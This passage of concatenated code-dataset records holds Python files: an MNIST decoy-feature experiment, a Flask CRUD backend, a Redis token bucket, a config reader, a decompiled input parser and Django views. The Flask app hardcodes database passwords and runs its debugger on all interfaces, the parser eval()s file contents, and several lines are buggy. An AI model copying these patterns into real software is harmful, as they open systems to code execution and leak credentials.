self.num_epochs = num_epochs\n if self.status.annotations_loaded:\n self.model.fit(self.X,\n self.y,\n hypothesis=self.hypothesis,\n num_epochs=num_epochs,\n always_include=self.affected_indices)\n else:\n self.model.fit(self.X, self.y, num_epochs=num_epochs)\n self.status.trained = True\n\n @property\n def metadata(self):\n if self.hypothesis.per_annotation:\n weight = self.hypothesis.weight / max(self.hypothesis.num_annotations, 1)\n else:\n weight = self.hypothesis.weight\n return {\n 'name': self.name,\n 'hypothesis_weight': weight,\n 'per_annotation': self.hypothesis.per_annotation,\n 'n_annotations': self.hypothesis.num_annotations,\n 'train_accuracy': self.train_accuracy,\n 'test_accuracy': self.test_accuracy,\n 'num_epochs': self.num_epochs\n }\n\n def save_experiment(self):\n filename = str(int(time.time()))\n self.name = filename\n self.train_accuracy, self.test_accuracy = self.score_model()\n save_dict = self.__dict__.copy()\n do_not_save = ['Xr', 'X', 'y', 'E', 'Xtr', 'Et']\n for attr in do_not_save:\n save_dict.pop(attr)\n\n with open(os.path.join(DecoyMNIST.MODELS_DIR, filename), 'wb') as f:\n pickle.dump(save_dict, f)\n with open(DecoyMNIST.SAVED_EXPERIMENTS_CACHE_FILE, 'rb') as f:\n try:\n saved_experiments = json.load(f)\n except Exception:\n saved_experiments = []\n with open(DecoyMNIST.SAVED_EXPERIMENTS_CACHE_FILE, 'wb') as f:\n saved_experiments.append(self.metadata)\n json.dump(saved_experiments, f)\n return filename\n\n\n def explain(self, idx=None):\n if not self.status.trained:\n raise AttributeError(\n 'You must have trained the model to be able to generate explanations.')\n\n if idx is None:\n idx = random.randint(0, len(self.Xt))\n\n predicted_label = 
self.model.predict(np.array([self.Xt[idx]]))[0]\n\n explanation_grid(self.model.grad_explain(np.array([self.Xt[idx]])), (28, 28), size=50)\n\n # Get explanation image\n filename = 'temp{}'.format(int(time.time()))\n plt.savefig(filename)\n explain_image = self._convert_image_to_base64(Image.open(open(filename + '.png', 'rb')))\n os.remove(filename + '.png')\n\n return {\n 'data': 'data:image/png;base64,' + explain_image,\n 'ground_truth': int(self.yt[idx]),\n 'predicted': predicted_label\n }\n\n def explain2(self, idx=None):\n if not self.status.trained:\n raise AttributeError(\n 'You must have trained the model to be able to generate explanations.')\n\n if idx is None:\n idx = random.randint(0, len(self.Xt))\n\n image = self.Xt[idx]\n image = np.reshape(image, (28, 28))\n predicted_label = self.model.predict(np.array([self.Xt[idx]]))[0]\n\n def preprocessor(inputs):\n inputs = inputs[:, :, :, 0]\n return np.reshape(inputs, (-1, 784))\n\n self.model.input_preprocessor = preprocessor\n\n explainer = lime_image.LimeImageExplainer()\n explanation = explainer.explain_instance(image,\n self.model.predict_proba,\n top_labels=10,\n num_samples=3000)\n temp, mask = explanation.get_image_and_mask(\n predicted_label, positive_only=False, hide_rest=False)\n masked_image = mark_boundaries(temp / 2 + 0.5, mask)\n image = Image.fromarray(masked_image.astype('uint8'))\n image.show()\n masked_image_binary = self._convert_image_to_base64(image)\n return {\n 'data': 'data:image/jpg;base64,' + masked_image_binary,\n 'ground_truth': int(self.yt[idx]),\n 'predicted': predicted_label\n }\n\n def score_model(self):\n return (\n self.model.score(self.X, self.y),\n self.model.score(self.Xt, self.yt)\n )\n\n def download_mnist(self, datadir):\n if not os.path.exists(datadir):\n os.makedirs(datadir)\n\n base_url = 'http://yann.lecun.com/exdb/mnist/'\n\n def parse_labels(filename):\n with gzip.open(filename, 'rb') as fh:\n magic, num_data = struct.unpack(\">II\", fh.read(8))\n return np.array(array.array(\"B\", fh.read()), dtype=np.uint8)\n\n def parse_images(filename):\n with gzip.open(filename, 'rb') as fh:\n magic, num_data, rows, cols = struct.unpack(\n \">IIII\", fh.read(16))\n return np.array(array.array(\"B\", fh.read()), dtype=np.uint8).reshape(num_data, rows, cols)\n\n for filename in ['train-images-idx3-ubyte.gz', 'train-labels-idx1-ubyte.gz',\n 't10k-images-idx3-ubyte.gz', 't10k-labels-idx1-ubyte.gz']:\n if not os.path.exists(os.path.join(datadir, filename)):\n try:\n urlretrieve(base_url + filename,\n os.path.join(datadir, filename))\n except:\n with open(os.path.join(datadir, filename), 'w') as f:\n f.write(urlopen(base_url + filename).read())\n\n train_images = parse_images(os.path.join(\n datadir, 'train-images-idx3-ubyte.gz'))\n train_labels = parse_labels(os.path.join(\n datadir, 'train-labels-idx1-ubyte.gz'))\n test_images = parse_images(os.path.join(\n datadir, 't10k-images-idx3-ubyte.gz'))\n test_labels = parse_labels(os.path.join(\n datadir, 't10k-labels-idx1-ubyte.gz'))\n\n return train_images, train_labels, test_images, test_labels\n\n def Bern(self, p):\n return np.random.rand() < p\n\n def augment(self, image, digit, randomize=False, mult=25, all_digits=range(10)):\n if randomize:\n return self.augment(image, np.random.choice(all_digits))\n\n img = image.copy()\n expl = np.zeros_like(img)\n\n fwd = [0, 1, 2, 3]\n rev = [-1, -2, -3, -4]\n dir1 = fwd if self.Bern(0.5) else rev\n dir2 = fwd if self.Bern(0.5) else rev\n for i in dir1:\n for j in dir2:\n img[i][j] = 255 - mult * digit\n expl[i][j] 
= 1\n\n return img.ravel(), expl.astype(bool).ravel()\n\n def _generate_dataset(self, datadir):\n X_raw, y, Xt_raw, yt = self.download_mnist(datadir)\n all_digits = list(set(y))\n\n X = []\n E = []\n Xt = []\n Et = []\n\n for image, digit in zip(X_raw, y):\n x, e = self.augment(image, digit, all_digits=all_digits)\n X.append(x)\n E.append(e)\n\n for image, digit in zip(Xt_raw, yt):\n x, e = self.augment(\n image, digit, all_digits=all_digits, randomize=True)\n Xt.append(x)\n Et.append(e)\n\n X = np.array(X)\n E = np.array(E)\n Xt = np.array(Xt)\n Et = np.array(Et)\n Xr = np.array([x.ravel() for x in X_raw])\n Xtr = np.array([x.ravel() for x in Xt_raw])\n\n return Xr, X, y, E, Xtr, Xt, yt, Et\n\n def get_image(self, array):\n img = array.reshape((28, 28))\n img = Image.fromarray(img)\n return img\n\n def generate_tagging_set(self, Xtr, size=20):\n indices = []\n for i in range(size):\n index = npr.randint(0, len(Xtr))\n if index in indices:\n continue\n indices.append(index)\n image = self.get_image(Xtr[index], index)\n image.save('tagging/decoy_mnist/' + str(index) + '.png')\n\n\nif __name__ == '__main__':\n print('Training with annotations')\n decoy_mnist = DecoyMNIST()\n decoy_mnist.generate_dataset()\n decoy_mnist.load_annotations(weight=10, per_annotation=True)\n # decoy_mnist = DecoyMNIST.load_experiment('1525843725', prepend_path=True)\n decoy_mnist.train(num_epochs=1)\n decoy_mnist.save_experiment()\n # decoy_mnist.explain()\n # print(decoy_mnist.explain())\n\n # print('Training without annotations')\n # decoy_mnist.unload_annotations()\n # decoy_mnist.train(num_epochs=2)\n # print(decoy_mnist.score_model())\n","sub_path":"rfft/applications/decoy_mnist.py","file_name":"decoy_mnist.py","file_ext":"py","file_size_in_byte":14191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"94183335","text":"import torch\nimport torch.nn as nn\n\nfrom medtrialextractor.constants import INFINITY\n\nclass Pooler(nn.Module):\n def __init__(self, config):\n super(Pooler, self).__init__()\n self.dense = nn.Linear(config.hidden_size, config.hidden_size)\n self.activation = nn.Tanh()\n\n def pool_head(self, hidden_states, mask):\n # Use the representation of START MARKER\n extended_mask = mask.unsqueeze(1)\n h = torch.bmm(extended_mask.float(), hidden_states).squeeze(1)\n h = self.activation(self.dense(h))\n return h # batch_size, seqlen\n\n def pool_span(self, hidden_states, mask):\n # MaxPooling over the whole span\n extended_mask = mask.unsqueeze(-1).bool()\n h = hidden_states.masked_fill(~extended_mask, -INFINITY)\n h = torch.max(h, dim=1)[0]\n h = self.activation(self.dense(h))\n return h\n\n\n","sub_path":"medtrialextractor/models/pooler.py","file_name":"pooler.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"599925874","text":"from flask import Flask, jsonify, request\nimport os\nimport BusinessObjects as bo\nimport DataObjects as do\n\napp = Flask(__name__)\n\ndb_ip = os.getenv('db_ip') #'10.0.2.15'\nConnectionData = {}\nConnectionData['user'] = 'postgres'\nConnectionData['password'] = 'postgres'\nConnectionData['host'] = str(db_ip)\nConnectionData['port'] = '5432'\nConnectionData['database'] = 'thigiuaki'\n\n@app.route('/')\ndef hello(): \n #return 'this is backend'\n c1 = bo.Customer(1, 'DAU xanh', 'Peter', '566 Nui Thanh', 'Danang', '50000', 'Vietnam')\n return c1.City\n\n@app.route('/customer_insert')\ndef test_insert():\n #ConnectionString 
= 'database=northwind user=postgres password=postgres host=10.0.2.15 port=5432'\n    c2 = do.Customer(ConnectionData)\n    c1 = bo.Customer(1, 'Lanh', 'Nguyen', '566 Nui Thanh', 'Danang', '50000', 'Vietnam')\n    s1 = c2.insert(c1)\n    return s1\n    \n@app.route('/ca_insert')\ndef test_insertca():\n    #ConnectionString = 'database=northwind user=postgres password=postgres host=10.0.2.15 port=5432'\n    c2 = do.Categories(ConnectionData)\n    c1 = bo.Categories(1 , 'hello' , 'dadadad')\n    s1 = c2.insert(c1)\n    return s1\n\n# CUSTOMER API\n# Insert\n@app.route('/customer/insert', methods=['POST'])\ndef user_insert():\n    data = request.json\n    c1 = bo.Customer(data['CustomerID'], \n                     data['CustomerName'],\n                     data['ContactName'], \n                     data['Address'], \n                     data['City'], \n                     data['PostalCode'], \n                     data['Country'])\n    c2 = do.Customer(ConnectionData)\n    s1 = c2.insert(c1)\n    result = {}\n    result['message'] = s1\n    return jsonify(result), 200\n\n\n\n#Show all item from Customer\n@app.route('/customer/all_Customer')\ndef get_all_user():\n    result = do.Customer(ConnectionData).get_all()\n    return jsonify(result), 200\n# --------------------\n\n# Delete customer\n@app.route('/customer/delete/<customer_id>' , methods=['DELETE'])\ndef delete_user_by_id(customer_id):\n    c = bo.Customer(CustomerID = customer_id)\n    result = do.Customer(ConnectionData).delete(c)\n    return jsonify({'message': result[0]}),result[1]\n# Update customer\n\n@app.route('/customer/update/<customer_id>' , methods=['PUT'])\ndef update_coustomer(customer_id):\n    data = request.json\n    c = bo.Customer(CustomerID = customer_id , CustomerName=data['CustomerName'], ContactName=data['ContactName'], Address=data['Address'], City = data['City'], PostalCode=data['PostalCode'], Country=data['Country'])\n    result = do.Customer(ConnectionData).update(c)\n    return jsonify({'message': result[0]}),result[1]\n\n#Show some row by ID\n@app.route('/customer/get/<user_id>')\ndef get_user_by_id(user_id):\n    c = bo.Customer(CustomerID = user_id)\n    result = do.Customer(ConnectionData).get_by_id(c)\n    if result[1] != 200:\n        return jsonify({'message': result[0]}) , result[1]\n    return jsonify(result[0].to_json()) , 200\n    \n\n# Categories API\n@app.route('/categories/all')\ndef get_all_ca():\n    result = do.Categories(ConnectionData).get_all()\n    return jsonify(result), 200\n    \n@app.route('/category/insert', methods=['POST'])\ndef insert_category():\n    data = request.json\n    category = bo.Categories(category_name=data['category_name'], description=data['description'])\n    result = do.Categories(ConnectionData).insert(category)\n    return jsonify({'message': result}), 200\n\n@app.route('/category/get/<category_id>')\ndef get_category_by_id(category_id):\n    category = bo.Categories(CategoryID=category_id)\n    result = do.Categories(ConnectionData).get_by_id(category)\n    if result[1] != 200:\n        return jsonify({'message': result[0]}), result[1]\n    return jsonify(result[0].to_json()), 200\n\n@app.route('/category/update/<category_id>', methods=['PUT'])\ndef update_category_by_id(category_id):\n    data = request.json\n    category = bo.Categories(CategoryID=category_id, CategoryName=data['category_name'], Description=data['description'])\n    result = do.Categories(ConnectionData).update(category)\n    return jsonify({'message': result[0]}), result[1]\n\n@app.route('/category/delete/<category_id>', methods=['DELETE'])\ndef delete_category_by_id(category_id):\n    c = bo.Categories(CategoryID=category_id)\n    result = do.Categories(ConnectionData).delete(c)\n    return jsonify({'message': result[0]}), result[1]\n#*******************************************************************\n# Shipper
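\n# The shipper, supplier and product sections below repeat the CRUD shape of\n# the customer and category sections above. A generic helper could collapse\n# much of that boilerplate; a sketch (hypothetical, though every do.* class\n# used in this file does expose get_all):\n#\n#   def crud_get_all(do_cls):\n#       return jsonify(do_cls(ConnectionData).get_all()), 200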
\n\n\n@app.route('/shipper/all')\ndef get_all_shipper():\n c = do.Shippers(ConnectionData).get_all()\n return jsonify(c), 200\n\n@app.route('/shipper/get/')\ndef get_shipper_by_id(shipper_id):\n shipper = bo.Shippers(ShipperID=shipper_id)\n result = do.Shippers(ConnectionData).get_by_id(shipper)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n@app.route('/shipper/insert', methods=['POST'])\ndef insert_shipper():\n data = request.json\n shipper = bo.Shippers(ShipperName=data['shipper_name'], Phone=data['phone'])\n result = do.Shippers(ConnectionData).insert(shipper)\n return jsonify({'message': result}), 200\n\n@app.route('/shipper/update/', methods=['PUT'])\ndef update_shipper_by_id(shipper_id):\n data = request.json\n shipper = bo.Shippers(ShipperID=shipper_id, ShipperName=data['shipper_name'], Phone=data['phone'])\n result = do.Shippers(ConnectionData).update(shipper)\n return jsonify({'message': result[0]}), result[1]\n\n@app.route('/shipper/delete/', methods=['DELETE'])\ndef delete_shipper_by_id(shipper_id):\n c = bo.Shipper(ShipperID=shipper_id)\n result = do.Shippers(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\n# Supplier\n\n@app.route('/supplier/insert', methods=['POST'])\ndef supplier_insert():\n data = request.json\n c1 = bo.Suppliers(SupplierName=data['SupplierName'], ContactName=data['ContactName'], Address=data['Address'], City=data['City'], PostalCode=data['PostalCode'], Country=data['Country'], Phone=data['Phone'])\n c2 = do.Suppliers(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/supplier/all')\ndef get_all_supplier():\n result = do.Suppliers(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/supplier/get/')\ndef get_supplier_by_id(supplier_id):\n c = bo.Suppliers(SupplierID=supplier_id)\n result = do.Suppliers(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n\n@app.route('/supplier/update/', methods=['PUT'])\ndef update_supplier_by_id(supplier_id):\n data = request.json\n c = bo.Suppliers(SupplierID=supplier_id, SupplierName=data['SupplierName'], ContactName=data['ContactName'], Address=data['Address'], City=data['City'], PostalCode=data['PostalCode'], Country=data['Country'], Phone=data['Phone'])\n result = do.Suppliers(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n\n@app.route('/supplier/delete/', methods=['DELETE'])\ndef delete_supplier_by_id(supplier_id):\n c = bo.Suppliers(SupplierID=supplier_id)\n result = do.Suppliers(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n \n# Products:\n@app.route('/product/insert', methods=['POST'])\ndef product_insert():\n data = request.json\n c1 = bo.Products(ProductID=data['product_name'], Unit=data['Unit'], Price=data['price'], SupplierID=data['supplier_id'], CategoryID=data['category_id'])\n c2 = do.Products(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/product/all')\ndef get_all_product():\n result = do.Products(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/product/', methods=['GET', 'PUT', 'DELETE'])\ndef handle_product(product_id):\n if request.method == 'GET':\n # Get a product\n c = bo.Products(ProductID=product_id)\n result = do.Products(ConnectionData).get_by_id(c)\n 
 if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update a product\n data = request.json\n c = bo.Products(ProductID=product_id, ProductName=data['product_name'], Unit=data['unit'], Price=data['price'], SupplierID=data['supplier_id'], CategoryID=data['category_id'])\n result = do.Products(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete a product\n c = bo.Products(ProductID=product_id)\n result = do.Products(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\n# Orders API\n\n@app.route('/order/all')\ndef get_all_order():\n result = do.Orders(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/order/insert', methods=['POST'])\ndef order_insert():\n data = request.json\n c1 = bo.Orders(CustomerID=data['customer_id'], EmployeeID=data['employee_id'], OrderDate=data['order_date'], ShipperID=data['shipper_id'])\n c2 = do.Orders(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/order/<order_id>', methods=['GET', 'PUT', 'DELETE'])\ndef handle_order(order_id):\n if request.method == 'GET':\n # Get an order\n c = bo.Orders(OrderID=order_id)\n result = do.Orders(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update an order\n data = request.json\n c = bo.Orders(OrderID=order_id, CustomerID=data['customer_id'], EmployeeID=data['employee_id'], OrderDate=data['order_date'], ShipperID=data['shipper_id'])\n result = do.Orders(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete an order\n c = bo.Orders(OrderID=order_id)\n result = do.Orders(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\n\n# Employee \n\n@app.route('/employee/all')\ndef get_all_employee():\n result = do.Employees(ConnectionData).get_all()\n return jsonify(result), 200\n\n\n@app.route('/employee/insert', methods=['POST'])\ndef employee_insert():\n data = request.json\n c1 = bo.Employees(LastName=data['last_name'], FirstName=data['first_name'], BirthDate=data['birth_date'], Photo=data['photo'], Notes=data['notes'])\n c2 = do.Employees(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n\n@app.route('/employee/<employee_id>', methods=['GET', 'PUT', 'DELETE'])\ndef handle_employee(employee_id):\n if request.method == 'GET':\n # Get an employee\n c = bo.Employees(EmployeeID=employee_id)\n result = do.Employees(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update an employee\n data = request.json\n c = bo.Employees(EmployeeID=employee_id, LastName=data['last_name'], FirstName=data['first_name'], BirthDate=data['birth_date'], Photo=data['photo'], Notes=data['notes'])\n result = do.Employees(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete an employee\n c = bo.Employees(EmployeeID=employee_id)\n result = do.Employees(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n# Order Detail\n@app.route('/order_detail/insert', methods=['POST'])\ndef 
order_detail_insert():\n data = request.json\n c1 = bo.OrderDetails(OrderID=data['order_id'], ProductID=data['product_id'], Quantity=data['quantity'])\n c2 = do.OrderDetails(ConnectionData)\n s1 = c2.insert(c1)\n result = {}\n result['message'] = s1\n return jsonify(result), 200\n\n@app.route('/order_detail/all')\ndef get_all_order_detail():\n result = do.OrderDetails(ConnectionData).get_all()\n return jsonify(result), 200\n\n@app.route('/order_detail/<order_detail_id>', methods=['GET', 'PUT', 'DELETE'])\ndef handle_order_detail(order_detail_id):\n if request.method == 'GET':\n # Get an order detail\n c = bo.OrderDetails(OrderDetailID=order_detail_id)\n result = do.OrderDetails(ConnectionData).get_by_id(c)\n if result[1] != 200:\n return jsonify({'message': result[0]}), result[1]\n return jsonify(result[0].to_json()), 200\n elif request.method == 'PUT':\n # Update an order detail\n data = request.json\n c = bo.OrderDetails(OrderDetailID=order_detail_id, OrderID=data['order_id'], ProductID=data['product_id'], Quantity=data['quantity'])\n result = do.OrderDetails(ConnectionData).update(c)\n return jsonify({'message': result[0]}), result[1]\n elif request.method == 'DELETE':\n # Delete an order detail\n c = bo.OrderDetails(OrderDetailID=order_detail_id)\n result = do.OrderDetails(ConnectionData).delete(c)\n return jsonify({'message': result[0]}), result[1]\n\nif __name__ == \"__main__\":\n app.debug = True\n app.run(host='0.0.0.0', port=8080)\n ","sub_path":"webappbackend/backend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"162692110","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n############################################\n# File Name : Bucket.py\n# Created By : Suluo - sampson.suluo@gmail.com\n# Creation Date: 2018-07-10\n# Last Modified: 2018-10-31 22:26:34\n# Descption :\n# Version : Python 3.6\n############################################\nimport argparse\nimport time\nimport os\nimport sys\n\nfrom settings import SQL\n\nimport logging\n\n\nclass TokenBucketQPS(object):\n \"\"\"Token bucket\n arguments:\n rate: rate at which tokens are issued\n capacity: size of the bucket, i.e. the maximum number of tokens it can hold\n \"\"\"\n\n def __init__(self, name, rate=0, capacity=None):\n self.logger = logging.getLogger(__name__)\n self._name = name\n self._rate = rate\n if capacity:\n self._capacity = capacity\n else:\n self._capacity = rate\n\n self.redis = SQL.redis\n\n self.current_name = self._name + \"_current\"\n self.time_name = self._name + \"_time\"\n\n self.redis.set(self.current_name, 0)\n self.redis.set(self.time_name, time.time())\n\n def consume(self, sn=None, token_amount=1):\n '''\n arguments:\n token_amount is the number of tokens required to send the data\n '''\n t0 = time.time()\n status = False\n try:\n if self._capacity > 1 and self._rate > 1:\n _current_amount = int(self.redis.get(self.current_name))\n _last_consume_time = float(self.redis.get(self.time_name))\n # number of tokens now in the bucket: (now_time-last_time)*speed, so the program never has to block\n increment = int((time.time() - _last_consume_time) * self._rate)\n self.logger.debug(f\"{sn} current {_current_amount} time {_last_consume_time}\")\n # the token count must not exceed the bucket capacity\n _current_amount = min(\n increment + _current_amount, self._capacity)\n self.redis.set(self.current_name, _current_amount)\n\n if token_amount > _current_amount:\n status = False\n else:\n self.redis.decr(self.current_name, amount=token_amount)\n status = True\n self.redis.set(self.time_name, time.time())\n else:\n status = True\n except Exception as e:\n self.logger.error(f\"{e}\", exc_info=True)\n 
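# Refill rule used above: tokens accrue at self._rate per second since the last\n # consume and are capped at self._capacity; a request is admitted only when at\n # least token_amount tokens are available.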
 finally:\n self.logger.info(f\"{sn} get consume {status} takes {time.time() - t0}\")\n return status\n\n\ndef main(args):\n return args.num\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('-e', '--num', type=int, default=100, help='input num')\n args = parser.parse_args()\n main(args)\n\n\n","sub_path":"commons/util/Bucket.py","file_name":"Bucket.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"546107689","text":"#!python3\n#coding:utf-8\n\nimport configparser\nimport os\n# import smtplib\n# from email.mime.text import MIMEText\n# from email.mime.multipart import MIMEMultipart\n# import codecs\n\n# get the directory containing this file\nproDir=os.path.split(os.path.realpath(__file__))[0]\n\n# get the parent directory\ncurDir=os.path.dirname(proDir)\n# build the path to the config file inside the config folder\nconfigPath=os.path.join(curDir,\"config\\\\config.ini\")\n\nclass ReadConfig:\n def __init__(self):\n self.cf=configparser.ConfigParser()\n self.cf.read(configPath,encoding=\"utf-8-sig\")\n\n def get_email(self,name):\n value=self.cf[\"EMAIL\"][name]\n return value\n\n\n def get_http(self,name):\n # value=self.cf.get(\"testServer\",name)\n value=self.cf[\"testServer\"][name]\n return value\n\n\n# rc=ReadConfig()\n#\n# email=rc.get_email(\"mail_host\")\n# print(email)\n\n'''\nconf=configparser.ConfigParser()\nconf.read(\"C:\\\\Users\\\\liyan\\\\PycharmProjects\\\\Selnium_SaasWeb\\\\config\\\\config.ini\",encoding=\"utf-8-sig\")\nsections=conf.sections()\nlists=conf.items(\"EMAIL\")\n\nmail_host=conf.get(\"EMAIL\",\"mail_host\")\nmail_user=conf.get(\"EMAIL\",\"mail_user\")\nmail_pwd=conf.get(\"EMAIL\",\"mail_pwd\")\nmail_port=conf.get(\"EMAIL\",\"mail_port\")\nreceiver=conf.get(\"EMAIL\",\"receiver\")\n# there is more than one way to read from the config file\n# subject=conf.get(\"EMAIL\",\"subject\")\nsubject=conf[\"EMAIL\"][\"subject\"]\ncontent=conf.get(\"EMAIL\",\"content\")\nprint('Subject',subject)\n\n# the email sent here carries no attachment\nmsg=MIMEText(content)\nmsg['Subject']=subject\nmsg['From']=mail_user\nmsg['To']=receiver\n\nsmtp = smtplib.SMTP( mail_host ,port=mail_port)\nsmtp.login(mail_user,mail_pwd)\nsmtp.sendmail(mail_user,receiver,msg.as_string())\n\n\n# # send an email with an attachment\n# sendFile=open(\"D:\\\\autoAPI\\\\cookie.txt\",\"r\").read()\n# attr=MIMEText(sendFile,\"base64\",\"utf-8\")\n# attr[\"content-Type\"]=\"application/octet-stream\"\n# attr[\"content-Disposition\"]=\"attachment;filename='cookie.txt'\"\n#\n# msgRoot=MIMEMultipart(\"related\")\n# msgRoot[\"Subject\"]=\"my email content\"\n# msgRoot.attach(attr)\n#\n# smtp=smtplib.SMTP(mail_host,port=25)\n#\n# smtp.login(mail_user,mail_pwd)\n# smtp.sendmail(mail_user,receiver,attr.as_string())\n\nsmtp.quit()\nprint(\"Email sending finished\")\n\n'''\n\n\n","sub_path":"Selnium_SaasWeb/package/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"555302191","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/jobwrapper/inputclass.py\n# Compiled at: 2018-09-07 05:59:02\n# Size of source mod 2**32: 2575 bytes\nimport os, json\n\nclass inputparams:\n __doc__ = 'docstring for inputparams class'\n\n def __init__(self, path='./'):\n self._path = path\n self.parameters = {}\n self.read_inputfile()\n\n def getpath(self, path):\n \"\"\"same function as in other classes, could be refactored\"\"\"\n import 
tkinter\n from tkinter.filedialog import askdirectory\n if path == '':\n root = tkinter.Tk()\n path = askdirectory(parent=root, title='Select the HDF5 path')\n path = path + '/'\n root.destroy()\n self._path = path\n\n def isdumped(self):\n \"\"\"just return True or False is the file is already dumped\"\"\"\n return os.path.isfile(self._path + 'inputparams.txt')\n\n def read_inputfile(self):\n \"\"\"Parser of the input file , creating attributes of the class\"\"\"\n reps = {'D':'e', \n 'd':'e', \n '.TRUE.':'True', \n '.FALSE.':'False', \n '.False.':'False', \n 'Xe':'\"Xe\"', \n 'Ar':'\"Ar\"', \n 'FAr':'\"FAr\"', \n 'He':'\"He\"', \n 'Kr':'\"Kr\"', \n '=':''}\n with open(self._path + '/inputs') as (inputfile):\n [self.readinputline(line, reps) for line in inputfile]\n\n def readinputline(self, line, reps):\n if line[0] == '!':\n pass\n else:\n try:\n key, val = line.split(maxsplit=1)\n except ValueError:\n print('Error : The line is Empty !!')\n exit()\n\n if len(val.split()) > 1:\n val, __ = val.split(maxsplit=1)\n for old, new in reps.items():\n val = val.replace(old, new)\n\n try:\n self.parameters[key] = eval(val)\n except SyntaxError:\n print(key, val, line)\n\n def __str__(self):\n strings = ''\n for key, val in self.parameters.items():\n strings = ''.join([strings, key, ' = ', val, '\\n'])\n\n return strings","sub_path":"pycfiles/jobwrapper-0.1.1-py3.6/inputclass.cpython-36.py","file_name":"inputclass.cpython-36.py","file_ext":"py","file_size_in_byte":2278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"383301973","text":"from django.shortcuts import render\n\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import InsightSerializer\n\nfrom .models import Insight\n# Create your views here.\n\n@api_view(['GET'])\ndef apiOverview(request):\n api_urls = {\n 'List': '/insight-list/',\n 'Detail View': '/insight-detail/<str:pk>/',\n 'Create': '/insight-create/',\n 'Update': '/insight-update/<str:pk>/',\n 'Delete': '/insight-delete/<str:pk>/'\n }\n return Response(api_urls)\n\n@api_view(['GET'])\ndef insightList(request):\n insights = Insight.objects.all()\n serializers = InsightSerializer(insights, many=True)\n return Response(serializers.data)\n\n@api_view(['GET'])\ndef insightDetail(request, pk):\n insights = Insight.objects.get(id=pk)\n serializers = InsightSerializer(insights, many=False)\n return Response(serializers.data)\n\n@api_view(['POST'])\ndef insightCreate(request):\n serializers = InsightSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data)\n\n@api_view(['POST'])\ndef insightUpdate(request, pk):\n insights = Insight.objects.get(id=pk)\n serializers = InsightSerializer(instance=insights, data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data)\n\n@api_view(['DELETE'])\ndef insightDelete(request, pk):\n insights = Insight.objects.get(id=pk)\n insights.delete()\n return Response(\"item deleted\")","sub_path":"insights/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
{"seq_id":"288018548","text":"# Task 1:\n# Given a list of fruits.\n# Write a program that prints the fruits as a numbered list,\n# aligned to the right-hand side.\n\n# Example:\n# Given: [\"яблоко\", \"банан\", \"киви\", \"арбуз\"]\n# Output:\n# 1. 
